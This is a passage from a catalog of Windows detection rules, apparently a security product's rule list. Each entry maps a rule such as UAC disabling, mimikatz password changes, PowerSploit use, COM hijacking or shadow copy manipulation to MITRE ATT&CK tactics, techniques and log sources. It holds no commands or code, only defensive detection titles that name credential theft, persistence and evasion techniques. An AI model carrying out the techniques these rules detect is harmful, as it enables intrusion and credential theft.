T1112 (Modify Registry)

Sysmon

Microsoft

Windows

RV-D-329

Default RDP port changed to a non-standard one

TA0005 (Defense Evasion)

T1547 (Boot or Logon Autostart Execution), T1547.010 (Boot or Logon Autostart Execution: Port Monitors)

Sysmon

Microsoft

Windows

RV-D-330

Sysmon driver load order changed

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Sysmon

Microsoft

Windows

RV-D-331

Modification of Winevt channel access permissions via the registry

TA0005 (Defense Evasion)

T1562.002 (Impair Defenses: Disable Windows Event Logging)

Sysmon

Microsoft

Windows

RV-D-332

Disabling HECI in the registry

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Sysmon

Microsoft

Windows

RV-D-333

Disabling administrative shares at startup

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.005 (Indicator Removal: Network Share Connection Removal)

Sysmon

Microsoft

Windows

RV-D-334

Disabling Privacy Settings Experience in the registry

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Sysmon

Microsoft

Windows

RV-D-335

Disabling User Account Control (UAC) in the registry

TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1548 (Abuse Elevation Control Mechanism), T1548.002 (Abuse Elevation Control Mechanism: Bypass User Account Control)

Sysmon

Microsoft

Windows

RV-D-336

Enabling DNS-over-HTTPS in the registry

TA0005 (Defense Evasion)

T1112 (Modify Registry), T1490 (Inhibit System Recovery)

Sysmon

Microsoft

Windows

RV-D-337

Setting a new DNS ServerLevelPluginDll value

TA0005 (Defense Evasion)

T1112 (Modify Registry), T1574 (Hijack Execution Flow), T1574.002 (DLL Side-Loading)

Sysmon

Microsoft

Windows

RV-D-338

Suspicious modification of COM/WMI registry keys

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Sysmon

Microsoft

Windows

RV-D-339

Modification of hidden Explorer keys

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)

Sysmon

Microsoft

Windows

RV-D-340

Hiding a scheduled task via Index Value Tamper

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)

Sysmon

Microsoft

Windows

RV-D-341

Suspicious path in the Keyboard Layout IME registry value

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Sysmon

Microsoft

Windows

RV-D-342

Enabling LM hash storage

TA0005 (Defense Evasion)

T1112 (Modify Registry)

Sysmon

Microsoft

Windows

RV-D-343

Module loaded into the regsvr32 process from a non-standard path

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.010 (System Binary Proxy Execution: Regsvr32)

Sysmon

Microsoft

Windows

RV-D-344

Script execution via regsvr32

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.010 (System Binary Proxy Execution: Regsvr32)

Sysmon

Microsoft

Windows

RV-D-345

Module loaded into the rundll32 process from a non-standard path

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.011 (System Binary Proxy Execution: Rundll32)

Sysmon

Microsoft

Windows

RV-D-346

rundll32 process loading script-execution modules

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.011 (System Binary Proxy Execution: Rundll32)

Sysmon

Microsoft

Windows

RV-D-347

Weakening of system protection or monitoring

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-348

Persistence via the WerFault ReflectDebugger registry key

TA0005 (Defense Evasion), TA0003 (Persistence)

T1036 (Masquerading), T1036.003 (Masquerading: Rename Legitimate Utilities), T1112 (Modify Registry)

Security, Sysmon

Microsoft

Windows

RV-D-349

XSL script execution detected

TA0005 (Defense Evasion)

T1220 (XSL Script Processing)

Security, Sysmon

Microsoft

Windows

RV-D-350

Account discovery detected

TA0007 (Discovery)

T1059 (Command and Scripting Interpreter), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1087.002 (Account Discovery: Domain Account)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-351

System discovery via WMI

TA0007 (Discovery)

T1047 (Windows Management Instrumentation), T1592 (Gather Victim Host Information), T1592.004 (Gather Victim Host Information: Client Configurations)

Security

Microsoft

Windows

RV-D-352

Process discovery

TA0007 (Discovery)

T1047 (Windows Management Instrumentation), T1057 (Process Discovery), T1059 (Command and Scripting Interpreter), T1592 (Gather Victim Host Information), T1592.002 (Gather Victim Host Information: Software)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-353

Domain trust discovery

TA0002 (Execution), TA0007 (Discovery)

T1059 (Command and Scripting Interpreter), T1482 (Domain Trust Discovery), T1590 (Gather Victim Network Information), T1590.003 (Gather Victim Network Information: Network Trust Dependencies)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-354

Network share enumeration detected

TA0007 (Discovery)

T1047 (Windows Management Instrumentation), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1135 (Network Share Discovery)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-355

Execution of Sysinternals PsSuspend

TA0007 (Discovery), TA0003 (Persistence)

T1543 (Create or Modify System Process), T1543.003 (Create or Modify System Process: Windows Service)

Security, Sysmon

Microsoft

Windows

RV-D-356

Registry key enumeration for discovery

TA0007 (Discovery)

T1012 (Query Registry)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-357

Enumeration of registry keys of potential interest for discovery

TA0007 (Discovery)

T1012 (Query Registry)

Security

Microsoft

Windows

RV-D-358

Remote system discovery

TA0007 (Discovery)

T1018 (Remote System Discovery), T1047 (Windows Management Instrumentation), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-359

Local system configuration discovery

TA0007 (Discovery)

T1047 (Windows Management Instrumentation), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1082 (System Information Discovery), T1592 (Gather Victim Host Information), T1592.004 (Gather Victim Host Information: Client Configurations)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-360

Collection of network connection information

TA0007 (Discovery)

T1049 (System Network Connections Discovery), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-361

System time discovery detected

TA0007 (Discovery)

T1047 (Windows Management Instrumentation), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1124 (System Time Discovery)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-362

whoami executed with SYSTEM privileges

TA0007 (Discovery)

T1033 (System Owner/User Discovery)

Security, Sysmon

Microsoft

Windows

RV-D-363

Command-line interpreter launched by WinRAR

TA0002 (Execution), TA0005 (Defense Evasion)

T1027.015 (Obfuscated Files or Information: Compression), T1203 (Exploitation for Client Execution)

Security, Sysmon

Microsoft

Windows

RV-D-364

Exploitation of CVE-2023-46944 in the GitLens extension for VSCode on Windows

TA0002 (Execution)

T1203 (Exploitation for Client Execution)

Security, Sysmon

Microsoft

Windows

RV-D-365

Use of the DSInternals hacking tool detected

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1201 (Password Policy Discovery), T1484 (Domain or Tenant Policy Modification), T1558 (Steal or Forge Kerberos Tickets)

PowerShell

Microsoft

Windows

RV-D-366

Use of the nishang hacking tool detected

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory), T1003.002 (OS Credential Dumping: Security Account Manager), T1005 (Data from Local System), T1027 (Obfuscated Files or Information), T1027.010 (Obfuscated Files or Information: Command Obfuscation), T1041 (Exfiltration Over C2 Channel), T1046 (Network Service Discovery), T1056 (Input Capture), T1056.001 (Input Capture: Keylogging), T1056.002 (Input Capture: GUI Input Capture), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1082 (System Information Discovery), T1087 (Account Discovery), T1102 (Web Service), T1105 (Ingress Tool Transfer), T1218 (System Binary Proxy Execution), T1218.004 (System Binary Proxy Execution: InstallUtil), T1218.011 (System Binary Proxy Execution: Rundll32), T1547 (Boot or Logon Autostart Execution), T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder), T1564 (Hide Artifacts), T1564.004 (Hide Artifacts: NTFS File Attributes), T1566 (Phishing)

PowerShell

Microsoft

Windows

RV-D-367

Use of the OWA-Toolkit hacking tool detected

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1114 (Email Collection), T1133 (External Remote Services), T1560 (Archive Collected Data)

PowerShell

Microsoft

Windows

RV-D-368

Use of the PowerShell-Suit hacking tool detected

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory), T1021 (Remote Services), T1021.006 (Remote Services: Windows Remote Management), T1057 (Process Discovery), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)

PowerShell

Microsoft

Windows

RV-D-369

Use of the PowerShellArsenal hacking tool detected

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory), T1021 (Remote Services), T1021.006 (Remote Services: Windows Remote Management), T1057 (Process Discovery), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)

PowerShell

Microsoft

Windows

RV-D-370

File download from a remote server via PowerShell

TA0008 (Lateral Movement)

T1021 (Remote Services), T1021.004 (Remote Services: SSH), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1105 (Ingress Tool Transfer), T1566 (Phishing), T1566.002 (Phishing: Spearphishing Link)

PowerShell

Microsoft

Windows

RV-D-371

Possible use of PowerShell obfuscation detected

TA0005 (Defense Evasion)

T1027 (Obfuscated Files or Information), T1027.010 (Obfuscated Files or Information: Command Obfuscation), T1027.015 (Obfuscated Files or Information: Compression), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)

PowerShell

Microsoft

Windows

RV-D-372

Masquerading of PowerShell execution detected

TA0005 (Defense Evasion)

T1036 (Masquerading), T1036.005 (Masquerading: Match Legitimate Resource Name or Location), T1036.006 (Masquerading: Match Legitimate Resource Name or Location), T1036.007 (Masquerading: Double File Extension), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)

Sysmon

Microsoft

Windows

RV-D-373

Use of WinAPI via PowerShell detected

TA0005 (Defense Evasion)

T1027 (Obfuscated Files or Information), T1055 (Process Injection), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1106 (Native API)

PowerShell

Microsoft

Windows

RV-D-374

Use of the PowerSploit hacking tool detected

TA0005 (Defense Evasion), TA0004 (Privilege Escalation), TA0003 (Persistence), TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1005 (Data from Local System), T1006 (Direct Volume Access), T1012 (Query Registry), T1027 (Obfuscated Files or Information), T1027.005 (Obfuscated Files or Information: Indicator Removal from Tools), T1027.010 (Obfuscated Files or Information: Command Obfuscation), T1047 (Windows Management Instrumentation), T1053 (Scheduled Task/Job), T1053.002 (Scheduled Task/Job: At), T1053.005 (Scheduled Task/Job: Scheduled Task), T1055 (Process Injection), T1055.001 (Process Injection: Dynamic-link Library Injection), T1056 (Input Capture), T1057 (Process Discovery), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1113 (Screen Capture), T1123 (Audio Capture), T1134 (Access Token Manipulation), T1212 (Exploitation for Credential Access), T1222 (File and Directory Permissions Modification), T1222.001 (File and Directory Permissions Modification: Windows File and Directory Permissions Modification), T1482 (Domain Trust Discovery), T1543 (Create or Modify System Process), T1543.003 (Create or Modify System Process: Windows Service), T1547 (Boot or Logon Autostart Execution), T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder), T1547.005 (Boot or Logon Autostart Execution: Security Support Provider), T1552 (Unsecured Credentials), T1552.002 (Unsecured Credentials: Credentials in Registry), T1552.006 (Unsecured Credentials: Group Policy Preferences), T1555 (Credentials from Password Stores), T1555.004 (Credentials from Password Stores: Windows Credential Manager), T1558 (Steal or Forge Kerberos Tickets), T1558.003 (Steal or Forge Kerberos Tickets: Kerberoasting), T1574 (Hijack Execution Flow), T1574.001 (Hijack Execution Flow: DLL), T1574.007 (Hijack Execution Flow: Path Interception by PATH Environment Variable), T1574.008 (Hijack Execution Flow: Path Interception by Search Order Hijacking), T1574.009 (Hijack Execution Flow: Path Interception by Unquoted Path), T1588 (Obtain Capabilities), T1588.002 (Obtain Capabilities: Tool), T1620 (Reflective Code Loading)

PowerShell

Microsoft

Windows

RV-D-375

Use of the PSMapExec hacking tool detected

TA0008 (Lateral Movement)

T1021 (Remote Services), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1078 (Valid Accounts), T1558 (Steal or Forge Kerberos Tickets), T1558.001 (Steal or Forge Kerberos Tickets: Golden Ticket), T1569 (System Services)

PowerShell

Microsoft

Windows

RV-D-376

Use of the SharpHound hacking tool detected

TA0007 (Discovery)

T1018 (Remote System Discovery), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1482 (Domain Trust Discovery)

PowerShell

Microsoft

Windows

RV-D-377

Scheduled task creation via FileCreation

TA0002 (Execution), TA0003 (Persistence), TA0004 (Privilege Escalation)

T1053 (Scheduled Task/Job), T1053.005 (Scheduled Task/Job: Scheduled Task)

Sysmon

Microsoft

Windows

RV-D-378

Process loaded a module from a UNC path

TA0002 (Execution)

T1129 (Shared Modules)

Sysmon

Microsoft

Windows

RV-D-379

URL scheme in a process command line

TA0002 (Execution)

T1129 (Shared Modules)

Security

Microsoft

Windows

RV-D-380

Use of malicious utilities

TA0005 (Defense Evasion), TA0002 (Execution)

T1006 (Direct Volume Access), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-381

PowerShell initiated a network connection

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)

Sysmon

Microsoft

Windows

RV-D-382

Exploitation of the WinRAR vulnerability CVE-2023-38831

TA0002 (Execution)

T1203 (Exploitation for Client Execution)

Sysmon

Microsoft

Windows

RV-D-383

Suspicious operations via WMI detected

-

-

Security

Microsoft

Windows

RV-D-384

Potential script execution via WScript/CScript

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.005 (Command and Scripting Interpreter: Visual Basic), T1059.007 (Command and Scripting Interpreter: JavaScript)

Security, Sysmon

Microsoft

Windows

RV-D-385

Use of PowerShell via third-party tools

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)

Sysmon

Microsoft

Windows

RV-D-386

User or host password change via Ksetup.exe

TA0040 (Impact)

T1531 (Account Access Removal)

Security, Sysmon

Microsoft

Windows

RV-D-387

Addition of a potentially suspicious download source to Winget

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Security, Sysmon

Microsoft

Windows

RV-D-388

Extraction of CAB files via Wusa.EXE

TA0002 (Execution)

-

Security, Sysmon

Microsoft

Windows

RV-D-389

PowerShell execution policy change

TA0005 (Defense Evasion)

T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)

Sysmon

Microsoft

Windows

RV-D-390

Script launched from a temporary directory

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1059.005 (Command and Scripting Interpreter: Visual Basic), T1059.006 (Command and Scripting Interpreter: Python), T1059.007 (Command and Scripting Interpreter: JavaScript)

Security, Sysmon

Microsoft

Windows

RV-D-391

Creation of a Self Extracting Package in a suspicious location

TA0002 (Execution)

T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-392

Service creation or modification via command-line utilities

TA0040 (Impact)

T1489 (Service Stop)

Security

Microsoft

Windows

RV-D-393

Service created with suspicious parameters

TA0002 (Execution)

T1569 (System Services), T1569.002 (System Services: Service Execution)

Security

Microsoft

Windows

RV-D-394

Modification of critical service parameters

TA0002 (Execution)

T1569 (System Services), T1569.002 (System Services: Service Execution)

Security, Sysmon

Microsoft

Windows

RV-D-395

Service executable path changed by non-standard means

TA0002 (Execution)

T1569 (System Services), T1569.002 (System Services: Service Execution)

Security, Sysmon

Microsoft

Windows

RV-D-396

Service installed from a non-system/non-standard path

TA0002 (Execution)

T1569 (System Services), T1569.002 (System Services: Service Execution)

Security

Microsoft

Windows

RV-D-397

Use of the cygwin1.dll library

TA0011 (Command and Control)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell)

Sysmon

Microsoft

Windows

RV-D-398

Command execution on the system by the VSCode code editor

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1176 (Software Extensions), T1176.002 (Software Extensions: IDE Extensions), T1204 (User Execution), T1204.001 (User Execution: Malicious Link)

Security, Sysmon

Microsoft

Windows

RV-D-399

Remote connection to a host via VSCode tunneling

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1176 (Software Extensions), T1176.002 (Software Extensions: IDE Extensions), T1204 (User Execution), T1204.001 (User Execution: Malicious Link), T1219 (Remote Access Tools), T1219.001 (Remote Access Tools: IDE Tunneling), T1572 (Protocol Tunneling)

Security, Sysmon

Microsoft

Windows

RV-D-400

WMI module loaded by a suspicious process

TA0002 (Execution)

T1047 (Windows Management Instrumentation)

Sysmon

Microsoft

Windows

RV-D-401

AD structure export via csvde.exe

TA0007 (Discovery)

T1087 (Account Discovery), T1087.002 (Account Discovery: Domain Account)

Security, Sysmon

Microsoft

Windows

RV-D-402

AD structure collection via Ldifde

TA0009 (Collection), TA0002 (Execution)

T1005 (Data from Local System)

Security, Sysmon

Microsoft

Windows

RV-D-403

amsi.dll loaded by an unusual process

TA0005 (Defense Evasion), TA0040 (Impact)

T1490 (Inhibit System Recovery)

Sysmon

Microsoft

Windows

RV-D-404

RstrtMgr.dll loaded by an unusual process

TA0005 (Defense Evasion), TA0040 (Impact)

T1486 (Data Encrypted for Impact), T1562.001 (Impair Defenses: Disable or Modify Tools)

Sysmon

Microsoft

Windows

RV-D-405

Desktop background changed via the registry

TA0005 (Defense Evasion), TA0040 (Impact)

T1112 (Modify Registry), T1491 (Defacement), T1491.001 (Defacement: Internal Defacement)

Sysmon

Microsoft

Windows

RV-D-406

System Restore disabled in the registry

TA0040 (Impact)

T1490 (Inhibit System Recovery)

Sysmon

Microsoft

Windows

RV-D-407

Shadow copy manipulation via built-in utilities

TA0040 (Impact)

T1490 (Inhibit System Recovery)

Security

Microsoft

Windows

RV-D-408

Logons to a device under different accounts

TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)

T1078 (Valid Accounts)

Security

Microsoft

Windows

RV-D-409

Interactive logon under a service account

TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)

T1078 (Valid Accounts)

Security

Microsoft

Windows

RV-D-410

Logon under a non-existent user

TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)

T1078 (Valid Accounts)

Security

Microsoft

Windows

RV-D-411

Logon under a default account

TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts)

Security

Microsoft

Windows

RV-D-412

Logon under an administrator account

TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)

T1078 (Valid Accounts)

Security

Microsoft

Windows

RV-D-413

Logons from different hosts to one host under the same account

TA0001 (Initial Access)

T1078 (Valid Accounts)

Security

Microsoft

Windows

RV-D-414

Logons to multiple hosts under the same account

TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.002 (Valid Accounts: Domain Accounts)

Security

Microsoft

Windows

RV-D-415

Remote session established via WMI

TA0008 (Lateral Movement)

T1047 (Windows Management Instrumentation)

Security

Microsoft

Windows

RV-D-416

Use of the SharpMove tool

TA0008 (Lateral Movement)

T1021 (Remote Services), T1021.002 (Remote Services: SMB/Windows Admin Shares)

Security, Sysmon

Microsoft

Windows

RV-D-417

Remote process launch via the MMC20.Application DCOM object

TA0008 (Lateral Movement)

T1021 (Remote Services), T1021.003 (Remote Services: Distributed Component Object Model)

Security

Microsoft

Windows

RV-D-418

Remote exploitation of the ShellWindows DCOM object

TA0008 (Lateral Movement)

T1021 (Remote Services), T1021.003 (Remote Services: Distributed Component Object Model)

Security

Microsoft

Windows

RV-D-419

Remote process launch via WMI

TA0008 (Lateral Movement)

T1021 (Remote Services)

Security

Microsoft

Windows

RV-D-420

Connection to an SMB share over QUIC

TA0008 (Lateral Movement)

T1570 (Lateral Tool Transfer)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-421

Remote command execution via SMBExec

TA0003 (Persistence), TA0008 (Lateral Movement), TA0002 (Execution)

T1021 (Remote Services), T1021.002 (Remote Services: SMB/Windows Admin Shares), T1543 (Create or Modify System Process), T1543.003 (Create or Modify System Process: Windows Service), T1569 (System Services), T1569.002 (System Services: Service Execution), T1570 (Lateral Tool Transfer)

Security

Microsoft

Windows

RV-D-422

Creation of a new domain/local/computer account

TA0003 (Persistence)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account), T1136.002 (Create Account: Domain Account)

Security

Microsoft

Windows

RV-D-423

Persistence via the AeDebug Debugger registry key

TA0003 (Persistence)

T1547 (Boot or Logon Autostart Execution)

Sysmon

Microsoft

Windows

RV-D-424

File association change

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.001 (Event Triggered Execution: Change Default File Association)

Sysmon

Microsoft

Windows

RV-D-425

Password change via the mimikatz utility

TA0003 (Persistence)

T1098 (Account Manipulation)

Security

Microsoft

Windows

RV-D-426

Deletion of a domain/local/computer account

TA0003 (Persistence)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account), T1136.002 (Create Account: Domain Account)

Security

Microsoft

Windows

RV-D-427

Payload added to AppCert DLLs detected

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.009 (Event Triggered Execution: AppCert DLLs)

Sysmon

Microsoft

Windows

RV-D-428

Payload added to AppInit DLLs detected

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.010 (Event Triggered Execution: AppInit DLLs)

Sysmon

Microsoft

Windows

RV-D-429

Replacement of Windows accessibility feature files detected

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.008 (Event Triggered Execution: Accessibility Features)

Sysmon

Microsoft

Windows

RV-D-430

WMI subscription creation

TA0002 (Execution)

T1047 (Windows Management Instrumentation), T1546 (Event Triggered Execution), T1546.003 (Event Triggered Execution: Windows Management Instrumentation Event Subscription)

Sysmon

Microsoft

Windows

RV-D-431

Third-party software injection via the IFEO debugger

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.012 (Event Triggered Execution: Image File Execution Options Injection)

Sysmon

Microsoft

Windows

RV-D-432

Potential payload added to Netsh Helper DLLs

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.007 (Event Triggered Execution: Netsh Helper DLL)

Sysmon

Microsoft

Windows

RV-D-433

Executable added to a PowerShell profile detected

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.013 (Event Triggered Execution: PowerShell Profile)

PowerShell, Sysmon

Microsoft

Windows

RV-D-434

Persistence via a Shim

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.011 (Event Triggered Execution: Application Shimming)

Security, Sysmon

Microsoft

Windows

RV-D-435

User account created that masquerades as a computer account

TA0003 (Persistence)

-

Security

Microsoft

Windows

RV-D-436

Account enabled or disabled

TA0003 (Persistence)

T1098 (Account Manipulation)

Security

Microsoft

Windows

RV-D-437

Account created and deleted within one minute

TA0003 (Persistence)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account), T1136.002 (Create Account: Domain Account)

Security

Microsoft

Windows

RV-D-438

Account SPN change

TA0004 (Privilege Escalation)

T1098 (Account Manipulation)

Security

Microsoft

Windows

RV-D-439

Exploitation of logon scripts

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1037 (Boot or Logon Initialization Scripts), T1037.001 (Boot or Logon Initialization Scripts: Logon Script (Windows))

Security, Sysmon

Microsoft

Windows

RV-D-440

Persistence via modification of registry autorun keys

TA0003 (Persistence)

T1547 (Boot or Logon Autostart Execution), T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder)

Sysmon

Microsoft

Windows

RV-D-441

Possible persistence via a file placed in the Startup folder

TA0003 (Persistence)

T1547 (Boot or Logon Autostart Execution), T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder)

Security, Sysmon

Microsoft

Windows

RV-D-442

Exploitation of Active Setup in the registry

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1547 (Boot or Logon Autostart Execution), T1547.014 (Boot or Logon Autostart Execution: Active Setup)

Security, Sysmon

Microsoft

Windows

RV-D-443

Persistence via creation/modification of authentication packages in the registry

TA0003 (Persistence)

T1547 (Boot or Logon Autostart Execution), T1547.002 (Boot or Logon Autostart Execution: Authentication Package)

Security, Sysmon

Microsoft

Windows

RV-D-444

Persistence via COM Hijacking

TA0003 (Persistence), TA0004 (Privilege Escalation), TA0002 (Execution)

T1546 (Event Triggered Execution), T1546.015 (Event Triggered Execution: Component Object Model Hijacking), T1559 (Inter-Process Communication), T1559.001 (Inter-Process Communication: Component Object Model)

Sysmon

Microsoft

Windows

RV-D-445

Exploitation of LSASS drivers in the registry

TA0003 (Persistence)

T1547 (Boot or Logon Autostart Execution), T1547.008 (Boot or Logon Autostart Execution: LSASS Driver)

Security, Sysmon

Microsoft

Windows

RV-D-446

Exploitation of Port Monitors in the registry

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1547 (Boot or Logon Autostart Execution), T1547.010 (Boot or Logon Autostart Execution: Port Monitors)

Security, Sysmon

Microsoft

Windows

RV-D-447

Persistence via exploitation of Print Processors in the file system through a suspicious DLL

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1547 (Boot or Logon Autostart Execution), T1547.012 (Boot or Logon Autostart Execution: Print Processors)

Security, Sysmon

Microsoft

Windows

RV-D-448

Persistence via exploitation of Print Processors in the registry

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1547 (Boot or Logon Autostart Execution), T1547.012 (Boot or Logon Autostart Execution: Print Processors)

Security, Sysmon

Microsoft

Windows

RV-D-449

Persistence via exploitation of SSP (Security Support Provider) in the registry

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1547 (Boot or Logon Autostart Execution), T1547.005 (Boot or Logon Autostart Execution: Security Support Provider)

Security, Sysmon

Microsoft

Windows

RV-D-450

Creation/modification of time provider keys in the registry

TA0003 (Persistence)

T1547 (Boot or Logon Autostart Execution), T1547.003 (Boot or Logon Autostart Execution: Time Providers)

Security, Sysmon

Microsoft

Windows

RV-D-451

Registry addition of files autostarted by the Winlogon process

TA0003 (Persistence)

T1547 (Boot or Logon Autostart Execution), T1547.004 (Boot or Logon Autostart Execution: Winlogon Helper DLL)

Security, Sysmon

Microsoft

Windows

RV-D-452

Payload executed on a WMI event

TA0002 (Execution)

T1047 (Windows Management Instrumentation), T1546 (Event Triggered Execution), T1546.003 (Event Triggered Execution: Windows Management Instrumentation Event Subscription)

Sysmon

Microsoft

Windows

RV-D-453

File launched from the Recycle Bin

TA0003 (Persistence), TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)

Security, Sysmon

Microsoft

Windows

RV-D-454

COR Profiler environment variables enabled

TA0003 (Persistence), TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1574 (Hijack Execution Flow), T1574.012 (Hijack Execution Flow: COR_PROFILER)

Sysmon

Microsoft

Windows

RV-D-455

Persistence via the MyComputer registry key

TA0003 (Persistence)

-

Sysmon

Microsoft

Windows

RV-D-456

Winget administrator settings change

TA0005 (Defense Evasion), TA0003 (Persistence)

-

Sysmon

Microsoft

Windows

RV-D-457

Account password reset via the mimikatz utility

TA0003 (Persistence)

T1098 (Account Manipulation)

Security

Microsoft

Windows

RV-D-458

Scheduled task manipulation via the registry

TA0003 (Persistence)

T1053 (Scheduled Task/Job), T1053.005 (Scheduled Task/Job: Scheduled Task)

Sysmon

Microsoft

Windows

RV-D-459

Task Scheduler changes

TA0003 (Persistence), TA0002 (Execution)

T1053 (Scheduled Task/Job), T1053.002 (Scheduled Task/Job: At), T1053.005 (Scheduled Task/Job: Scheduled Task)

Security

